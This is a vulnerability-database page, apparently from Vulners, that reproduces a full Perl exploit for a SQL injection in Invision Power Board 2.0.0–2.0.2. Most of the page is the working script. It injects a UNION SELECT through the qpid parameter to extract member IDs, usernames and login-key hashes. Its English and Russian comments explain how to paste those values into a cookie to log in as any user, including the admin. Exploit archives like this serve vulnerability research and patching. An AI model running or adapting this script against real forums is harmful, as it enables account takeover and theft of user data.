Vulners
Lucene search
Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit
=========================================================
Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit
=========================================================
#!/usr/bin/perl
use IO::Socket;
# # # #
# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##
## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Пару слов о возвращаемом эксплоитом результате:
## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с
## помощью которого можно войти на форум под любым юзером без ввода пароля.
## member_id это также одноименное значение из кукиса.
## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените
## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 5)
{
print "-------------------------------------------------------------------------\r\n";
print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "usage:\r\n";
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n";
print "SERVER - server where IPB installed\r\n";
print "/DIR/ - IPB directory or / for no directory\r\n";
print "FORUM_NUM - number of existing forum\r\n";
print "TOPIC_NUM - number of existing topic\r\n";
print "SID - your session id\r\n";
print "[TABLE_PREFIX] - table prefix in database\r\n";
print "[USER_ID] - user id for exploiting\r\n\r\n";
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}
if (@ARGV < 6) { $get_table = 1; }
$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] FORUM: $fnum\r\n";
print "[>] TOPIC: $tnum\r\n";
print "[>] SID: $sid\r\n";
print "[>] PREFIX: $prefix\r\n";
print "[>] ID: $id\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if ($get_table == 1)
{
$path .= "&qpid=r57"
}
else
{
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20"):("%20");
$path .= "/*";
}
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
$suc =0;
if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; }
}
if (!$suc) { print "Exploit failed\r\n"; }
exit();
}
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; }
}
print "------------------------------------------------------------------------------------------------\r\n";
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); }
else { print "Exploit failed\r\n"; }
# 0day.today [2018-03-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Nov 2004 00:00Current
7.1High risk
Vulners AI Score7.1